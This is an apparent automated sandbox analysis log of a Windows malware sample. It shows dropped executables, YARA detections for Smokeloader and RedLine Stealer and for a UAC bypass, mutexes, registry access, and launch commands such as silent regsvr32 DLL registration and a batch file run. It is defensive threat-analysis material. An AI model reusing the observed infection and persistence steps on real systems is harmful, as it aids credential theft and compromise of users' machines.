Source: C:\Users\user\AppData\Local\Temp\C53F.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\C53F.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\C53F.exe	Section loaded: msvcr100.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: profapi.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: csunsapi.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: swift.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: nfhwcrhk.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: surewarehook.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: netapi32.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: netutils.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: wkscli.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: netapi32.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: netutils.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: wkscli.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: propsys.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\D0F8.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\D0F8.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\consent.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\consent.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\consent.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\consent.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\consent.exe	Section loaded: wmsgapi.dll
Source: C:\Windows\System32\consent.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\consent.exe	Section loaded: msctfmonitor.dll
Source: C:\Windows\System32\consent.exe	Section loaded: msimg32.dll
Source: C:\Windows\System32\consent.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\consent.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\consent.exe	Section loaded: msutb.dll
Source: C:\Windows\System32\consent.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\consent.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\consent.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\consent.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\consent.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\consent.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\consent.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\consent.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\consent.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\consent.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\consent.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\consent.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\E4FE.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\E4FE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Section loaded: userenv.dll

Source: MCYq2AqNU0.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 13.2.9E0E.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.9E0E.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.0.AF26.exe.c20000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: 0000001C.00000002.2615942734.0000000002371000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001C.00000002.2615767161.0000000000AAB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000020.00000002.2982480618.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.2456314399.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000020.00000002.2981951494.00000000008AB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001C.00000002.2615561764.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2139812917.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001B.00000002.2613214560.0000000002600000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2140044524.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2140105329.0000000002481000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001C.00000002.2615526346.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.2456240672.0000000000840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2139919357.0000000000ACD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000015.00000002.2688178585.0000000002A6F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2457679800.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.2457015789.000000000087D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000002.2371366172.000000000228E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000015.00000002.2690691611.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
Source: C:\Users\user\AppData\Local\Temp\AF26.exe, type: DROPPED	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: MCYq2AqNU0.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 7DFF.dll.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 81F7.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C53F.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ccjteug.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: usjteug.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: csrss.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.mine.winEXE@62/110@1005/100

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe

Code function: 0_2_00AD0C5B CreateToolhelp32Snapshot,Module32First,

0_2_00AD0C5B

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\ccjteug

Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Mutant created: \Sessions\1\BaseNamedObjects\jmuZVxzUSQKZJ
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_03
Source: C:\ProgramData\Drivers\csrss.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\7DFF.tmp

Source: Yara match	File source: 24.0.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000000.2521373252.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "

Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Command line argument: $Z=	9_2_004014FA
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Command line argument: S1RU	9_2_004014FA
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Command line argument: yu	9_2_004014FA

Source: MCYq2AqNU0.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: MCYq2AqNU0.exe

ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Users\user\Desktop\MCYq2AqNU0.exe C:\Users\user\Desktop\MCYq2AqNU0.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ccjteug C:\Users\user\AppData\Roaming\ccjteug
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\7DFF.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\7DFF.dll
